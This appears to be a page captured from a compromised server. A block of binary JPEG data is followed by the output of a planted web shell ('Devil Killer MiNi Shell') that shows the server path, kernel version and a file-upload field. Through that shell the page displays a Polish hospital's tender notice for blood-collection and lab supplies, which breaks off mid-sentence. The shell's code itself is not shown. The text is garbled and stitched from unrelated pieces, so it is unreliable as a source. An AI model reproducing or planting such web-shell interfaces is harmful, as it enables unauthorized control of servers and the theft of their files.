JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231012/0044140701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA ZAMKNIĘTEGO SYSTEMU POBIERANIA KRWI I<br/> JEDNORAZOWEGO SPRZĘTU LABORATORYJNEGO </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110196699</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Marka Sobieskiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krasnystaw</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@spzozkrasnystaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spzozkrasnystaw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA ZAMKNIĘTEGO SYSTEMU POBIERANIA KRWI I<br/> JEDNORAZOWEGO SPRZĘTU LABORATORYJNEGO </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-01aaad6d-6827-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00441407</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00073090/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.13 Dostawa zamknietego systemu pobierania krwi, jednorazowego sprzetu laboratoryjnego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://spzozkrasnystaw.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się drogą <br/>elektroniczną za pośrednictwem Platformy e-Zamawiający znajdującej się pod adresem https://spzozkrasnystaw.ezamawiajacy.pl oraz poczty elektronicznej: sekretariat@spzozkrasnystaw.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2.	W korespondencji kierowanej do Zamawiającego, Wykonawca powinien posługiwać się numerem sprawy ZP/230-30/2023<br/>3.	Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji (innych niż oferta) <br/>przekazywanych na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego. W przypadku skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia na Platformie. <br/>4.	Ogólne zasady korzystania z Platformy:<br/>1)	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://spzozkrasnystaw.ezamawiajacy.pl lub https://oneplace.marketplanet.pl<br/>2)	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub <br/>do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu <br/>rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod <br/>z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>3)	rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający <br/>zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>4)	po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, <br/>przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej w zakładce <br/>&#34;Pytania i odpowiedzi&#34;. Za datę przekazania zawiadomień oraz informacji przyjmuje się ich datę wczytania do Systemu.<br/>5.	Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami <br/>korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania <br/>teleinformatycznego Platforma zakupowa Tel. +48 22 257 22 23, e-mail: <br/>oneplace.admin@marketplanet.pl.<br/>6.	Zamawiający zgodnie z § 2 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. <br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych <br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu <br/>o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452 – zwane dalej <br/>„Rozporządzeniem”) określa dopuszczalny format kwalifikowanego podpisu elektronicznego, jako:<br/>1)	dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PadES;<br/>2)	dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. <br/>7.	Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia określa niezbędne wymagania sprzętowo - <br/>aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: <br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2)	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2 GB Ram, procesor <br/>Intel IV 2 GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, <br/>lub ich nowsze wersje; <br/>3)	zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0; <br/>4)	włączona obsługa JavaScript; <br/>5)	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. <br/>8.	Zamawiający zgodnie z §11 ust. 2 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana/Państwa danych osobowych jest Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie;<br/>2) Szpital powołał Inspektora Ochrony Danych, z którym może się Pani/Pan/Państwo skontaktować w przypadku jakichkolwiek pytań<br/>lub uwag dotyczących przetwarzania Pani/Pana/Państwa danych osobowych oraz przysługujących Pani/Panu/Państwu uprawnień<br/>wynikających z RODO. Dane kontaktowe: adres e-mail: daneosobowe@spzozkrasnystaw.pl<br/>3) Pani/Pana/Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem<br/>o udzielenie zamówienia publicznego pn. Dostawa jednorazowego sprzętu medycznego - powtórka (ZP/230-28/2023) prowadzonym<br/>w trybie podstawowym<br/>4) odbiorcami Pani/Pana/Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2023 r.<br/>poz. 1605 ze zm.), dalej „ustawa Pzp”;<br/>5) Pani/Pana/Państwa dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwania umowy przekracza 4 lat, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) Podanie przez Panią/Pana/Państwa danych osobowych ma charakter dobrowolny przy czym podanie przez Panią/Pana/Państwa<br/>danych osobowych bezpośrednio Pani/Pana/Państwa dotyczących jest wymogiem ustawowym określonym w przepisach ustawy<br/>Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana/Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie<br/>do art. 22 RODO, w tym nie będą podlegały profilowaniu;<br/>8) posiada Pani/Pan/Państwo:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana/Państwa dotyczących, w tym prawo do uzyskania<br/>kopii tych danych;<br/>− na podstawie art. 16 RODO prawo do sprostowania (poprawiania) Pani/Pana/Państwa danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych<br/>z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pa-ni/Pan/Państwo,<br/>że przetwarzanie danych osobowych Pani/Pana/Państwa dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9) nie przysługuje Pani/Panu/Państwu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana/Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/230-30/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 1 –Zamknięty system pobierania krwi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141300-3 - Urządzenia do nakłuwania żył, pobierania krwi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin dostawy	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/><br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1,00% = 1,00 punkt<br/>1.1.	Kryterium „Cena”: <br/>Oferty oceniane będą na podstawie ceny podanej w formularzu ofertowym. Największą ilość punktów (60) otrzyma oferta z najniższą ceną ofertową brutto, pozostałe oferty oceniane będą zgodnie ze wzorem:<br/><br/><br/><br/> najniższa cena ofertowa<br/>C = ------------------------------------ x 60,00%<br/> cena oferty badanej<br/><br/>1.2.	Kryterium „Termin dostawy”:<br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy – zawartego w Formularzu ofertowym. Maksymalny termin dostaw wynosi 3 dni licząc od dnia złożenia zamówienia. Największą ilość punktów otrzyma oferta, która zaoferuje najkrótszy termin dostawy. Oferty uzyskają następującą liczbę punktów:<br/>1 dzień - 20 pkt<br/>2 dni – 10 pkt<br/>3 dni – 0 pkt<br/>Oferta Wykonawcy, który zaoferuje termin dostaw cząstkowych dłuższy niż 3 dni zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako oferta niezgodna z treścią SWZ.<br/><br/>1.3. Kryterium „Termin rozpatrzenia reklamacji jakościowej ”:<br/>1. Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów otrzyma oferta, która zaoferuje najkrótszy termin rozpatrzenia reklamacji. Zamawiający wymaga, aby termin rozpatrzenia reklamacji wynosił maksymalnie 14 dni licząc od zgłoszenia reklamacji. Oferty uzyskają następującą liczbę punktów:<br/>do 7 dni – 20 pkt<br/>powyżej 7 do 10 dni – 10 pkt<br/>powyżej 10 do 14 dni – 0 pkt <br/>2.	Oferta Wykonawcy, który zaoferuje termin rozpatrzenia reklamacji dłuższy niż 14 dni zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako oferta niezgodna z treścią SWZ <br/>3.	Ocena końcowa: suma punktów przyznanych wg opisanych powyżej kryteriów tj. cena + termin dostawy + termin rozpatrzenia reklamacji jakościowej. Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska największą liczbę punktów.<br/>4.	Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>5.	Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów za wszystkie kryteria oceny łącznie. <br/>6.	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu <br/>na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający zastosuje procedurę określoną w art. 248 ustawy Pzp.<br/>7.	Jeżeli zaoferowana przez Wykonawcę cena, lub jej istotne części składowe, będą wydawały się rażąco niskie w stosunku do przedmiotu zamówienia lub będą budzić wątpliwości Zamawiającego <br/>co do możliwości wykonania przedmiotu zamówienia zgodnie z wymaganiami określonymi w SWZ, Zamawiający zażąda od Wykonawcy wyjaśnień, w tym złożenia dowodów w zakresie wyliczenia ceny lub jej istotnych części, zgodnie z art. 224 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 2 – Jednorazowy sprzęt laboratoryjny </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141000-0 - Jednorazowe, niechemiczne artykuły medyczne i hematologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin dostawy	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/><br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1,00% = 1,00 punkt<br/>1.1.	Kryterium „Cena”: <br/>Oferty oceniane będą na podstawie ceny podanej w formularzu ofertowym. Największą ilość punktów (60) otrzyma oferta z najniższą ceną ofertową brutto, pozostałe oferty oceniane będą zgodnie ze wzorem:<br/><br/><br/><br/> najniższa cena ofertowa<br/>C = ------------------------------------ x 60,00%<br/> cena oferty badanej<br/><br/>1.2.	Kryterium „Termin dostawy”:<br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy – zawartego w Formularzu ofertowym. Maksymalny termin dostaw wynosi 3 dni licząc od dnia złożenia zamówienia. Największą ilość punktów otrzyma oferta, która zaoferuje najkrótszy termin dostawy. Oferty uzyskają następującą liczbę punktów:<br/>1 dzień - 20 pkt<br/>2 dni – 10 pkt<br/>3 dni – 0 pkt<br/>Oferta Wykonawcy, który zaoferuje termin dostaw cząstkowych dłuższy niż 3 dni zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako oferta niezgodna z treścią SWZ.<br/><br/>1.3. Kryterium „Termin rozpatrzenia reklamacji jakościowej ”:<br/>1. Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów otrzyma oferta, która zaoferuje najkrótszy termin rozpatrzenia reklamacji. Zamawiający wymaga, aby termin rozpatrzenia reklamacji wynosił maksymalnie 14 dni licząc od zgłoszenia reklamacji. Oferty uzyskają następującą liczbę punktów:<br/>do 7 dni – 20 pkt<br/>powyżej 7 do 10 dni – 10 pkt<br/>powyżej 10 do 14 dni – 0 pkt <br/>2.	Oferta Wykonawcy, który zaoferuje termin rozpatrzenia reklamacji dłuższy niż 14 dni zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako oferta niezgodna z treścią SWZ <br/>3.	Ocena końcowa: suma punktów przyznanych wg opisanych powyżej kryteriów tj. cena + termin dostawy + termin rozpatrzenia reklamacji jakościowej. Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska największą liczbę punktów.<br/>4.	Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>5.	Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów za wszystkie kryteria oceny łącznie. <br/>6.	W 